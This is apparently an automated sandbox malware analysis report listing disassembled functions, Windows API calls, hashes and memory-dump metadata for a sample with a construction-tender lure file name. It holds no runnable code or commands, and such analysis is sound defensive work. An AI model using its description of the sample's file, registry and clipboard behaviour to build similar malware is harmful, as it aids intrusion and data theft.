                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 613200358-0
                                                                                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                          Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                          Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumNamesResource
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3334572018-0
                                                                                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                          Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                          Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseFind
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1863332320-0
                                                                                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                          Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                          Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                          Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                          • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                          Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004095FC
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                            • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                            • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3655998216-0
                                                                                                                          • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                          • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                          Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00445426
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1828521557-0
                                                                                                                          • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                          • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                          Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@FilePointermemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 609303285-0
                                                                                                                          • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                          • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                          Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2081463915-0
                                                                                                                          • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                          • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                          Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2136311172-0
                                                                                                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                          Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1936579350-0
                                                                                                                          • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                          • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                          Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1294909896-0
                                                                                                                          • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                          • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                          Function 00415308 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1294909896-0
                                                                                                                          • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                          • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                                          • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                          • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D

                                                                                                                          Non-executed Functions

                                                                                                                          Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                          • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                          • GetLastError.KERNEL32 ref: 00409974
